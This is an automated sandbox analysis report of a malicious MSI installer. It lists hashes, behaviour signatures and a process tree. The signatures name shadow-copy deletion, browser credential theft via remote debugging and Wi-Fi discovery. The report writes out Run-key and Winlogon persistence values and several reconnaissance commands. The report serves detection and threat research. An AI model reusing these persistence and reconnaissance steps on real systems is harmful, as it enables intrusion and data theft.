Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows11-21h2_x64 -
resource
win11-20250313-fr -
resource tags
arch:x64arch:x86image:win11-20250313-frlocale:fr-fros:windows11-21h2-x64systemwindows -
submitted
01/04/2025, 16:38
Static task
static1
Behavioral task
behavioral1
Sample
efdzdfzedzed.msi
Resource
win10ltsc2021-20250314-fr
Behavioral task
behavioral2
Sample
efdzdfzedzed.msi
Resource
win11-20250313-fr
General
-
Target
efdzdfzedzed.msi
-
Size
91.6MB
-
MD5
2d5c493e62a6949d4a8b093ec866fe33
-
SHA1
112b213e8e6e9135ea75485511fe69de5e43e45a
-
SHA256
e2d230e34b9ee9bd696956826ed35333ecd1ec0a9b3fd8451cb20202e26ed5f7
-
SHA512
2ae3c09383256c1f15809b006f5cd88f2c78d4ded61c69817ac87ef581c5c230dd0f387f1954a611d4d9b7c1d914ea5c1ddd54be59c847b644501b375efc06d0
-
SSDEEP
1572864:yoc2yEeTT7Ha7ZpSBhSd/KfggDzlC4n14SSWRrHA2o+osfiNs0mAAUaMnaSxxUMU:VcHTeZw4KVzlLn1rSQrHdoi0mAAxuJpC
Malware Config
Signatures
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
pid Process 4928 powershell.exe 6112 powershell.exe 5572 powershell.exe 5260 powershell.exe 2384 powershell.exe 5916 powershell.exe 2688 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables Task Manager via registry modification
-
Uses browser remote debugging 2 TTPs 12 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2300 chrome.exe 5932 chrome.exe 4932 chrome.exe 1496 msedge.exe 5208 msedge.exe 2424 msedge.exe 6124 msedge.exe 5320 msedge.exe 2964 chrome.exe 5640 chrome.exe 1740 msedge.exe 4224 msedge.exe -
Clipboard Data 1 TTPs 64 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 2292 powershell.exe 1776 powershell.exe 5512 cmd.exe 5060 powershell.exe 1204 powershell.exe 2248 cmd.exe 5700 powershell.exe 4796 cmd.exe 2132 cmd.exe 1832 powershell.exe 1468 powershell.exe 4744 cmd.exe 788 cmd.exe 232 powershell.exe 4692 cmd.exe 3216 powershell.exe 2492 cmd.exe 1660 powershell.exe 5464 cmd.exe 5640 cmd.exe 4180 cmd.exe 1428 powershell.exe 3336 powershell.exe 316 cmd.exe 2952 powershell.exe 4708 powershell.exe 1164 powershell.exe 3884 powershell.exe 1452 cmd.exe 1852 powershell.exe 5672 powershell.exe 1244 powershell.exe 2080 cmd.exe 1100 powershell.exe 5236 powershell.exe 2716 cmd.exe 4120 powershell.exe 5412 powershell.exe 4896 powershell.exe 1364 cmd.exe 1616 cmd.exe 2940 cmd.exe 2912 cmd.exe 4752 powershell.exe 5424 powershell.exe 6100 cmd.exe 5720 powershell.exe 1424 cmd.exe 5516 cmd.exe 5284 powershell.exe 2984 powershell.exe 3948 powershell.exe 5640 cmd.exe 4528 cmd.exe 1012 cmd.exe 5768 cmd.exe 3576 powershell.exe 280 cmd.exe 3776 powershell.exe 5420 cmd.exe 1368 cmd.exe 1304 cmd.exe 4932 cmd.exe 5652 cmd.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\efdzdfzedzed.exe efdzdfzedzed.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Windows_Health_Courtage_WQVzdq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\efdzdfzedzed.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows_Health_Courtage_WQVzdq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\efdzdfzedzed.exe" reg.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs
flow ioc 3 raw.githubusercontent.com 9 raw.githubusercontent.com 11 raw.githubusercontent.com 21 raw.githubusercontent.com 23 raw.githubusercontent.com 24 raw.githubusercontent.com 182 raw.githubusercontent.com 5 raw.githubusercontent.com 8 raw.githubusercontent.com 20 raw.githubusercontent.com 1 raw.githubusercontent.com 19 raw.githubusercontent.com 25 raw.githubusercontent.com 6 raw.githubusercontent.com 7 raw.githubusercontent.com 10 raw.githubusercontent.com 22 raw.githubusercontent.com 26 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipinfo.io 18 ipinfo.io -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe File opened for modification C:\Windows\system32\Recovery ReAgentc.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4620 tasklist.exe -
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Program Files\\Windows NT\\TableTextService\\efdzdfzedzed.exe" reg.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Windows NT\TableTextService\efdzdfzedzed.exe efdzdfzedzed.exe -
Drops file in Windows directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp msedge.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DF544259FFD820CE2D.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{7B3CC37E-0C10-4698-8297-73D8073E1AB8} msiexec.exe File created C:\Windows\SystemTemp\~DF913D3F7EE823B446.TMP msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe File opened for modification C:\Windows\Installer\e57b3ee.msi msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Installer\MSIB69E.tmp msiexec.exe File created C:\Windows\Installer\e57b3f0.msi msiexec.exe File created C:\Windows\SystemTemp\~DF7117BCCF6918BDEE.TMP msiexec.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File created C:\Windows\Installer\e57b3ee.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\SystemTemp\~DF76A3B55A087A8F84.TMP msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe -
Executes dropped EXE 5 IoCs
pid Process 5500 efdzdfzedzed.exe 3668 efdzdfzedzed.exe 4680 efdzdfzedzed.exe 1836 efdzdfzedzed.exe 1916 efdzdfzedzed.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5932 sc.exe -
Loads dropped DLL 12 IoCs
pid Process 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 3668 efdzdfzedzed.exe 4680 efdzdfzedzed.exe 3668 efdzdfzedzed.exe 3668 efdzdfzedzed.exe 3668 efdzdfzedzed.exe 3668 efdzdfzedzed.exe -
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 1836 msiexec.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2412 cmd.exe 5188 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000016c72ef864aebe750000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000016c72ef80000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090016c72ef8000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d16c72ef8000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000016c72ef800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1880 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2704 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879992016827003" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-994669834-3080981395-1291080877-1000\{E670FBA3-59FC-417E-B180-F2CC5E34C187} msedge.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1304 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1268 msiexec.exe 1268 msiexec.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe 5500 efdzdfzedzed.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
pid Process 2300 chrome.exe 2300 chrome.exe 2300 chrome.exe 2300 chrome.exe 1740 msedge.exe 1740 msedge.exe 1740 msedge.exe 1740 msedge.exe 1740 msedge.exe 1740 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1836 msiexec.exe Token: SeIncreaseQuotaPrivilege 1836 msiexec.exe Token: SeSecurityPrivilege 1268 msiexec.exe Token: SeCreateTokenPrivilege 1836 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1836 msiexec.exe Token: SeLockMemoryPrivilege 1836 msiexec.exe Token: SeIncreaseQuotaPrivilege 1836 msiexec.exe Token: SeMachineAccountPrivilege 1836 msiexec.exe Token: SeTcbPrivilege 1836 msiexec.exe Token: SeSecurityPrivilege 1836 msiexec.exe Token: SeTakeOwnershipPrivilege 1836 msiexec.exe Token: SeLoadDriverPrivilege 1836 msiexec.exe Token: SeSystemProfilePrivilege 1836 msiexec.exe Token: SeSystemtimePrivilege 1836 msiexec.exe Token: SeProfSingleProcessPrivilege 1836 msiexec.exe Token: SeIncBasePriorityPrivilege 1836 msiexec.exe Token: SeCreatePagefilePrivilege 1836 msiexec.exe Token: SeCreatePermanentPrivilege 1836 msiexec.exe Token: SeBackupPrivilege 1836 msiexec.exe Token: SeRestorePrivilege 1836 msiexec.exe Token: SeShutdownPrivilege 1836 msiexec.exe Token: SeDebugPrivilege 1836 msiexec.exe Token: SeAuditPrivilege 1836 msiexec.exe Token: SeSystemEnvironmentPrivilege 1836 msiexec.exe Token: SeChangeNotifyPrivilege 1836 msiexec.exe Token: SeRemoteShutdownPrivilege 1836 msiexec.exe Token: SeUndockPrivilege 1836 msiexec.exe Token: SeSyncAgentPrivilege 1836 msiexec.exe Token: SeEnableDelegationPrivilege 1836 msiexec.exe Token: SeManageVolumePrivilege 1836 msiexec.exe Token: SeImpersonatePrivilege 1836 msiexec.exe Token: SeCreateGlobalPrivilege 1836 msiexec.exe Token: SeBackupPrivilege 1092 vssvc.exe Token: SeRestorePrivilege 1092 vssvc.exe Token: SeAuditPrivilege 1092 vssvc.exe Token: SeBackupPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe Token: SeTakeOwnershipPrivilege 1268 msiexec.exe Token: SeRestorePrivilege 1268 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1836 msiexec.exe 1836 msiexec.exe 2300 chrome.exe 1740 msedge.exe 1740 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1268 wrote to memory of 4024 1268 msiexec.exe 84 PID 1268 wrote to memory of 4024 1268 msiexec.exe 84 PID 1268 wrote to memory of 5500 1268 msiexec.exe 87 PID 1268 wrote to memory of 5500 1268 msiexec.exe 87 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 3668 5500 efdzdfzedzed.exe 88 PID 5500 wrote to memory of 4680 5500 efdzdfzedzed.exe 89 PID 5500 wrote to memory of 4680 5500 efdzdfzedzed.exe 89 PID 5500 wrote to memory of 3644 5500 efdzdfzedzed.exe 90 PID 5500 wrote to memory of 3644 5500 efdzdfzedzed.exe 90 PID 3644 wrote to memory of 5316 3644 cmd.exe 92 PID 3644 wrote to memory of 5316 3644 cmd.exe 92 PID 5500 wrote to memory of 5216 5500 efdzdfzedzed.exe 94 PID 5500 wrote to memory of 5216 5500 efdzdfzedzed.exe 94 PID 5216 wrote to memory of 5236 5216 cmd.exe 96 PID 5216 wrote to memory of 5236 5216 cmd.exe 96 PID 5236 wrote to memory of 4780 5236 net.exe 97 PID 5236 wrote to memory of 4780 5236 net.exe 97 PID 5500 wrote to memory of 1140 5500 efdzdfzedzed.exe 98 PID 5500 wrote to memory of 1140 5500 efdzdfzedzed.exe 98 PID 5500 wrote to memory of 4812 5500 efdzdfzedzed.exe 99 PID 5500 wrote to memory of 4812 5500 efdzdfzedzed.exe 99 PID 4812 wrote to memory of 2384 4812 cmd.exe 102 PID 4812 wrote to memory of 2384 4812 cmd.exe 102 PID 1140 wrote to memory of 1008 1140 cmd.exe 103 PID 1140 wrote to memory of 1008 1140 cmd.exe 103 PID 5500 wrote to memory of 2944 5500 efdzdfzedzed.exe 104 PID 5500 wrote to memory of 2944 5500 efdzdfzedzed.exe 104 PID 2944 wrote to memory of 5916 2944 cmd.exe 106 PID 2944 wrote to memory of 5916 2944 cmd.exe 106 PID 5500 wrote to memory of 3576 5500 efdzdfzedzed.exe 108 PID 5500 wrote to memory of 3576 5500 efdzdfzedzed.exe 108 PID 3576 wrote to memory of 4928 3576 cmd.exe 110 PID 3576 wrote to memory of 4928 3576 cmd.exe 110 PID 5500 wrote to memory of 2228 5500 efdzdfzedzed.exe 111 PID 5500 wrote to memory of 2228 5500 efdzdfzedzed.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\efdzdfzedzed.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1836
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4024
-
-
C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"2⤵
- Drops startup file
- Drops file in Program Files directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5500 -
C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1804 --field-trial-handle=1808,i,15329382526256765507,8132514791881163678,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3668
-
-
C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe"C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --mojo-platform-channel-handle=1900 --field-trial-handle=1808,i,15329382526256765507,8132514791881163678,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:83⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5500 get ExecutablePath"3⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=5500 get ExecutablePath4⤵PID:5316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "NET SESSION"3⤵
- Suspicious use of WriteProcessMemory
PID:5216 -
C:\Windows\system32\net.exeNET SESSION4⤵
- Suspicious use of WriteProcessMemory
PID:5236 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 SESSION5⤵PID:4780
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"3⤵
- Suspicious use of WriteProcessMemory
PID:1140 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid4⤵PID:1008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance Win32_PhysicalMemory | Select-Object Capacity,Speed,Manufacturer,MemoryType,PartNumber,SerialNumber | ConvertTo-Json""3⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-CimInstance Win32_PhysicalMemory | Select-Object Capacity,Speed,Manufacturer,MemoryType,PartNumber,SerialNumber | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-Volume | Select-Object DriveLetter,FileSystemType,Size,SizeRemaining | ConvertTo-Json""3⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-Volume | Select-Object DriveLetter,FileSystemType,Size,SizeRemaining | ConvertTo-Json"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Select-Object InstanceId,Name,Manufacturer | ConvertTo-Json""3⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
